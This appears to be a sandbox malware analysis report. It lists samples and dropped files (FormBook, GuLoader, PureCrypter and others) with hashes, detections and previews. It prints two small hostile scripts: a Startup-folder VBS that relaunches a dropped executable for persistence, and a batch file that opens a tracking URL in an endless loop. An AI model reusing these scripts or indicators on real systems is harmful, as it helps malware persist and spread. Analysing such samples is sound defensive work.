37f463bf4616ecd445d4a1937da06e19	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.67.195.247
	Anfrage244384.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247
	Anfrage244384.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247
	Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247
	FmmYUD4pt7.wsf	Get hash	malicious	Unknown	Browse	172.67.195.247
	rA01_278 Check list#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.195.247
	VZ7xFmeuPX.exe	Get hash	malicious	Unknown	Browse	172.67.195.247
	2ULrUoVwTx.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247
	wmKmOQ868z.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247
	wmKmOQ868z.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.195.247

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	file.exe	Get hash	malicious	PureCrypter	Browse
C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	file.exe	Get hash	malicious	PureCrypter	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	file.exe	Get hash	malicious	PureCrypter	Browse
	file.exe	Get hash	malicious	PureCrypter	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4477947f1f.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	5.344873306377427
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzetfE4KnKIE4oKNzKo9E4KhZsXE4qdKm:MxHKlYHKh3oRAHKzetfHKntHo6lHKmHA
MD5:	8255A4767725CC323842B221CEAFCBEE
SHA1:	537C8C5384748F137B339E39BC0A7FA90DBBC112
SHA-256:	7B368AA23DA44F0789862A83A2FA7BD40B1E1FB3C19E69005FAEA382DD0252F5
SHA-512:	C9B2DB6E3059872EEBF2DDBF2CE19A76D794C01D50E6A178108F5DAF29BA3B93DCF048C72A4414FAB83026BBE062C6DB5BA91657EF4706853A26980342E2CDD8
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pohtent2[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.511535292862219
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGpvy:q43tISl6kXiMIWSU6XlI5LPtIpfGpa
MD5:	705515171C13EFC526CAE832A2F6EB76
SHA1:	BD1BCC1AEC9FDA9FBBCC9F0BAEDD7CB46B839272
SHA-256:	8EFE24BAC7B09BA27C4A92024F68AA0AF5C99874D63741C4D5812BC6B664699B
SHA-512:	783354EDF15491367CAE47BE181DE19C1D5F20919B8AE8870316A562DE000BD6FFD3E82A1A0AF49C37E241B98C4A127E9AE6ECAD0E7D03CF6BF60F74A685AFE4
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..l>....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2755072
Entropy (8bit):	6.477582165629937
Encrypted:	false
SSDEEP:	49152:HVhGIFR6VRG9cIxKRhIXUzpScFJ6Ts4PXTEIii6z:HVhRHYRG91xKR2XUtaTFfgI
MD5:	ACC11F67CF4889111898285909FFAC31
SHA1:	AEA58F207537B9B8421C4EBEE55D5BEF0B9E1CCE
SHA-256:	5A2C3A1411C081C949A02B6802BF69A11C685AC567E42C1B7919B42651574D3D
SHA-512:	25543B525E3841BD1532FF02AA166621E5C8295F71C5DA1D5E4535CB96D46D5E139AA5C9A44A4B33A40C05B2E9CA787F9E60120E2C990AD5738573CE18985B05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..................................`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qwqwnrei..).......)..:..............@...usbtzceq. ...`.......).............@....taggant.@....*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3249664
Entropy (8bit):	6.569313215282151
Encrypted:	false
SSDEEP:	49152:QqmlnHKY/Va+MTu577evgQk6INAdJOsNyzVh+SmGna:QqmBKWVa+My577evgQkk1SRna
MD5:	DABD794D5925E01CE2525D17795B56E1
SHA1:	A4263A74806958E0D6E01BC2A28D14359F27FEE7
SHA-256:	43E110EAEACFDE2AA3C8E84860E067BEDAF21DE0332651250F8BBFA0F50E8F95
SHA-512:	41A8AFB3A46882D7A3A20EA050C21FA0CF04DD2F9B0072E6B0D98EB398582F46E5CA7D2A8FE7433BD53B98E987C60C98FCFADAA4FD7BDC523A5C117E8B541D38
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............1...........@...........................1.....\.2...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...neuqwbdo..+.......+.................@...ivatdflj......1......n1.............@....taggant.0....1.."...t1.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	7.959447861099847
Encrypted:	false
SSDEEP:	49152:B9/ArF6/mpZv0YI9l32rXMsnSUUd23CFryn+uKfJHy:BerJpFJ4Ir8sS+iry+u
MD5:	3079517B64FB39F7AE3B94F9BA77F37F
SHA1:	2D43FDB6498F6397413D21D61F372D78BDD59B96
SHA-256:	A3128B43C4E57000B1F341F16B39FFCB2AB5FE0DF30AD978A16F341A6BABC595
SHA-512:	C4F74E47B9B3C4FF7D05E5AE4ED0559F270B45A1A3B567AF9E3CA0AC00B00928ED312F97B4640619CE20BC4D258111159EC295EA8D6E3C65A2147447E81B7EE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,......@q...........@..........................pq.....K. ...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .@).........................@...mjfoaubi.P....W..P..................@...luvachek.....0q.....................@....taggant.0...@q.."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1366016
Entropy (8bit):	7.978042355379222
Encrypted:	false
SSDEEP:	24576:IWIIfKlTyf7r3q007p9sG1n407g81LTq1uOht4xmUtjMCoBwrl6:tKts3p0Ds848ZuR4VMCrr
MD5:	CD97D09A95E215EFEE7A40605D6F734C
SHA1:	33F703DEFEF40B193CAC5D70B22DA72BB4916983
SHA-256:	BF7E9CF27CAC0D8EB54B86F28BF4C06507BD185BB1E3932DE1F5F86166A45778
SHA-512:	BFCD467763D5470B6C43487F4AFB071DDBFBDE9DDA8A0C13BF47250D58F0837241F817F971FC91A928C4BBBD789F541A63B53533E1B24554C70315D93637BD08
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,g............................n.... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H........'..P............x.....................................................H...='..................H...='.......................................(....&B('...(....o(...B(....rM..po)...b(....r...p .......o....s...........(-....(....6.\|.....(6....~....:....r...p.....(7...o8...s9........~.....~...........j(....r...p~....o:...t....b.:....r...psA...z.s;...b.:....r...psA...z.sB...f.:....r...psA...z..s-...f.:....r...psA...z..sC....~.(J....:....r...psA...z..}K...

C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1366016
Entropy (8bit):	7.978042355379222
Encrypted:	false
SSDEEP:	24576:IWIIfKlTyf7r3q007p9sG1n407g81LTq1uOht4xmUtjMCoBwrl6:tKts3p0Ds848ZuR4VMCrr
MD5:	CD97D09A95E215EFEE7A40605D6F734C
SHA1:	33F703DEFEF40B193CAC5D70B22DA72BB4916983
SHA-256:	BF7E9CF27CAC0D8EB54B86F28BF4C06507BD185BB1E3932DE1F5F86166A45778
SHA-512:	BFCD467763D5470B6C43487F4AFB071DDBFBDE9DDA8A0C13BF47250D58F0837241F817F971FC91A928C4BBBD789F541A63B53533E1B24554C70315D93637BD08
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,g............................n.... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H........'..P............x.....................................................H...='..................H...='.......................................(....&B('...(....o(...B(....rM..po)...b(....r...p .......o....s...........(-....(....6.\|.....(6....~....:....r...p.....(7...o8...s9........~.....~...........j(....r...p~....o:...t....b.:....r...psA...z.s;...b.:....r...psA...z.sB...f.:....r...psA...z..s-...f.:....r...psA...z..sC....~.(J....:....r...psA...z..}K...

C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3249664
Entropy (8bit):	6.569313215282151
Encrypted:	false
SSDEEP:	49152:QqmlnHKY/Va+MTu577evgQk6INAdJOsNyzVh+SmGna:QqmBKWVa+My577evgQkk1SRna
MD5:	DABD794D5925E01CE2525D17795B56E1
SHA1:	A4263A74806958E0D6E01BC2A28D14359F27FEE7
SHA-256:	43E110EAEACFDE2AA3C8E84860E067BEDAF21DE0332651250F8BBFA0F50E8F95
SHA-512:	41A8AFB3A46882D7A3A20EA050C21FA0CF04DD2F9B0072E6B0D98EB398582F46E5CA7D2A8FE7433BD53B98E987C60C98FCFADAA4FD7BDC523A5C117E8B541D38
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............1...........@...........................1.....\.2...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...neuqwbdo..+.......+.................@...ivatdflj......1......n1.............@....taggant.0....1.."...t1.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	7.959447861099847
Encrypted:	false
SSDEEP:	49152:B9/ArF6/mpZv0YI9l32rXMsnSUUd23CFryn+uKfJHy:BerJpFJ4Ir8sS+iry+u
MD5:	3079517B64FB39F7AE3B94F9BA77F37F
SHA1:	2D43FDB6498F6397413D21D61F372D78BDD59B96
SHA-256:	A3128B43C4E57000B1F341F16B39FFCB2AB5FE0DF30AD978A16F341A6BABC595
SHA-512:	C4F74E47B9B3C4FF7D05E5AE4ED0559F270B45A1A3B567AF9E3CA0AC00B00928ED312F97B4640619CE20BC4D258111159EC295EA8D6E3C65A2147447E81B7EE9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,......@q...........@..........................pq.....K. ...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .@).........................@...mjfoaubi.P....W..P..................@...luvachek.....0q.....................@....taggant.0...@q.."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2755072
Entropy (8bit):	6.477582165629937
Encrypted:	false
SSDEEP:	49152:HVhGIFR6VRG9cIxKRhIXUzpScFJ6Ts4PXTEIii6z:HVhRHYRG91xKR2XUtaTFfgI
MD5:	ACC11F67CF4889111898285909FFAC31
SHA1:	AEA58F207537B9B8421C4EBEE55D5BEF0B9E1CCE
SHA-256:	5A2C3A1411C081C949A02B6802BF69A11C685AC567E42C1B7919B42651574D3D
SHA-512:	25543B525E3841BD1532FF02AA166621E5C8295F71C5DA1D5E4535CB96D46D5E139AA5C9A44A4B33A40C05B2E9CA787F9E60120E2C990AD5738573CE18985B05
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..................................`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qwqwnrei..).......)..:..............@...usbtzceq. ...`.......).............@....taggant.@....*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\lIocM276SA.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3169280
Entropy (8bit):	6.657469379852796
Encrypted:	false
SSDEEP:	49152:MBHlNUta/wrqrskVylovLt3J1VupBIzge601xjnYeu:yFLwrijVylovLt3nVupev1+d
MD5:	ED91FED1365AF41A389141266378CFC8
SHA1:	FDAA4DDDC18C04ADB903505ACDD71D71EEE8FC68
SHA-256:	C399DA828C92DDF5858F839B584084927F5576AB15F842F3ACBD840A89DF638A
SHA-512:	C145BAD5F5946E715C6B322D5B531DC80202A8ECDBEA33A53D21C3A4A4120039DEECB33E3C8FB62DD28300080701C28FB1AABDC0718336ABD668EE298C4CDE51
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................`0...........@...........................0......91...@.................................W...k...........................@N0..............................M0..................................................... . ............................@....rsrc...............................@....idata ............................@...jtgdutaj..).......).................@...mylnqymk.....P0......40.............@....taggant.0...`0.."...:0.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\lIocM276SA.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\runner.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	146
Entropy (8bit):	5.078556875468508
Encrypted:	false
SSDEEP:	3:oAL2dcCUJ+S6LooKDDXc+EXjD0n/OdMfQ1JESiXaOAvDOxicS5yMvvCKRIQLn:o7e6Sv7c+EXX0/ks01lvvQicq1yKeQLn
MD5:	774958CCA4B2EE326C9176EB0373E7F9
SHA1:	E097607212573D8E284AE32090E1D928C021FD73
SHA-256:	98F06E75F9D86241753DBEDBF8B7B6A65DD3E9AAC8B852ED5C5A17A624823B28
SHA-512:	F4D44F7A72C8FBB942E45A2F493CE4700BB67B13ED166D6AAB97FF864DD640B938535CFDD62A683D4E9BC7AB68550205146DC2A9AD04E49345E5178B2CDB1EDF
Malicious:	false
Preview:	:: Generated By Viral Tool v1.0..@echo off..:run..start https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103..goto run

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.819374502933124
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5fwn:FER/lFHIwknaZ5o
MD5:	DB205E9288EE05BCB2DE9E3B64597968
SHA1:	647154C264D4A2B9CD2F0AFC81F5D6DE823358A0
SHA-256:	EE64DB45176DE0E3F45A9E13FFB3AC0EA514B88E23FAD6692CDFF2C7A5041594
SHA-512:	D247419C8ABE0738DDDA07B82C0CC4DD560DA6D37D0BB50FA2D1F25638AAC5A0F75707543FD6E0DC2C2155E70AFDF5A079B8968939C39643553E0DDE07AB5AD0
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\TypeId.exe"""

C:\Users\user\AppData\Roaming\TypeId.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	1366016
Entropy (8bit):	7.978042355379222
Encrypted:	false
SSDEEP:	24576:IWIIfKlTyf7r3q007p9sG1n407g81LTq1uOht4xmUtjMCoBwrl6:tKts3p0Ds848ZuR4VMCrr
MD5:	CD97D09A95E215EFEE7A40605D6F734C
SHA1:	33F703DEFEF40B193CAC5D70B22DA72BB4916983
SHA-256:	BF7E9CF27CAC0D8EB54B86F28BF4C06507BD185BB1E3932DE1F5F86166A45778
SHA-512:	BFCD467763D5470B6C43487F4AFB071DDBFBDE9DDA8A0C13BF47250D58F0837241F817F971FC91A928C4BBBD789F541A63B53533E1B24554C70315D93637BD08
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,g............................n.... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H........'..P............x.....................................................H...='..................H...='.......................................(....&B('...(....o(...B(....rM..po)...b(....r...p .......o....s...........(-....(....6.\|.....(6....~....:....r...p.....(7...o8...s9........~.....~...........j(....r...p~....o:...t....b.:....r...psA...z.s;...b.:....r...psA...z.sB...f.:....r...psA...z..s-...f.:....r...psA...z..sC....~.(J....:....r...psA...z..}K...

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\lIocM276SA.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.3792564919527477
Encrypted:	false
SSDEEP:	6:7KQnVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBmMt0:eqRf2RKQ1CGAFAjzvYRQVBnt0
MD5:	ADBA838CF1CD8540CFEBA8E5781F1407
SHA1:	226EBE69574B74D6383C99F6107E45859384774B
SHA-256:	D38C02EA52C2618B5A2C1CFAF5BF3BA7DEFACEF7F2B2F66C1B71BDC1774D4DF8
SHA-512:	F73D8ACEA50ED8394041BDF26F1ECFC450AA46A4EDEF4460BE5FDAE57F721C2F89569267CC016E3214342C1A366193FEE5A8F6C63A21D1D612062E46ECFB7CB7
Malicious:	false
Preview:	....eb,...iE...%.^..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0................. .@3P.........................

Chrome Cache Entry: 192

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (13095)
Category:	downloaded
Size (bytes):	211575
Entropy (8bit):	5.8833465651446675
Encrypted:	false
SSDEEP:	3072:FqRGSEE/QcZH1I9ezc/k7q28ItPkAUtN+ek/jsU:FqRGSV/QcZVI9eQ/4qHI5PsU
MD5:	58F552C66712A7BC97FDC1B22E4A63B9
SHA1:	5FB2A4951D4A4B6908C5D97F4641E2E802083583
SHA-256:	66D5568086BF5CB834AD1415F8505E44BED991F5942CF96107FE30CF08FE3E98
SHA-512:	1A447197073C9F46ABEFA0290AD609A06A5A299460DE58FD201A80D447218DAC2E9876B40C114F238F196097C320E512793B178CDCA66B8CAC5067B7AC9942B9
Malicious:	false
URL:	https://www.google.com/
Preview:	<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RKS4XN0gIndfVzA1btDYYA">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="RKS4XN0gIndfVzA1btDYYA">(function(){var _g={kEI:'NF8sZ4qbEPzWi-gP9LDl-Qk',kEXPI:'31',kBL:'b7oe',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){.var h=this\|\|self;function l(){return window.google!==void 0&&window.google.kOPI!==void 0&&window.google.kOPI!==0?window.google.kOPI:null};var m,n=[];function p(a){for(var b;a&&(!a.getAttribute\|\|!(b=a.getAttribute("eid")));)a=a.parentNode;return b\|\|m}function q(a){for(var b=null;a&&(!a.getAttribute\|\|!

Chrome Cache Entry: 193

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (621)
Category:	downloaded
Size (bytes):	1013811
Entropy (8bit):	5.691873394484966
Encrypted:	false
SSDEEP:	24576:+udhlEEzFSm2e8QriseNg5HjimLV0//qFN:jdhpFSm2bQriseNg5HjimLV0//qFN
MD5:	B8B644F81D13EC089FBD106E9B4206F1
SHA1:	3B4C8085ED4CDBDB175F982E710AF8D589354DFB
SHA-256:	D5B0C264035229F837C2E4D74D3DEFD231A14A3EADF723B086803E5B40F7C615
SHA-512:	A95AB384416C2585E7A3513B8E606F94C781C74CAAF428A1EED8ECCB033D0CF62670816FE09CEF8C7825F75D3C3E0B49A08625F34A2234A72D7BB7EA1865FDCF
Malicious:	false
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQRAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oGGWpbgHW_1tWSGsne1LX3PgXpInw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;S